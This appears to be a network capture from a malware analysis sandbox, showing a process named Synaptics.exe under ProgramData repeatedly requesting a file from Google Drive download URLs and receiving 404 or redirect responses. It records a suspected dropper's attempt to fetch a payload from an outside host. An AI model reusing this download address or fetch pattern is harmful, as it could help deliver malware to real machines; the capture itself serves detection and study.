                                                                                                                                                                    104192.168.2.449900142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:37 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:37 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6ZyLoaYjCr-Jc-XrvFVN_QOa0zg5rYUjXF4yWWiBX3CVdzOKfd-BS-ozphNGTKaaAr
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:37 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-j_HjNlZEvZlwl8B9WK6kXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:37 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:37 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 67 77 65 68 55 6a 41 51 52 66 4b 4e 37 36 54 77 61 67 41 70 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="sgwehUjAQRfKN76TwagApg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:37 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    105192.168.2.449901142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    106192.168.2.449903142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:38 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-AOy3fz3EjZp7s8mpR0BtVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    107192.168.2.449902142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:38 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-fVswUydJgVCusezwL-QIWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    108192.168.2.449904142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    109192.168.2.449906142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:39 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:39 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-IyNXfqBUL7FBKaAD6SvpSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    110192.168.2.449907142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:39 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:39 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-fPNvZmSzqJwC7wCjYeQNSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    111192.168.2.449908142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:39 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:39 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6fptvrk1rvcYhu9jn_A5I3uskYgEv56SDRQsBG9qB8z09MvacwwCAFBmhWyas9wo9K
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:39 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Isq4iJRQMKS29y9Gs5d_yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:39 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 59 64 7a 45 38 48 35 67 54 57 47 7a 62 67 76 52 54 37 41 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="OYdzE8H5gTWGzbgvRT7Amg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    112192.168.2.449909142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:39 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:39 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7bJ4bfnRhBPw_5gdvkn38o9n-HGASA01bBjYi9cjCIaeYr6GIFmYrE8kWYBt8F8qCJ
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:39 GMT
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-O9mM0oBOnTbNGYipsUvkVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
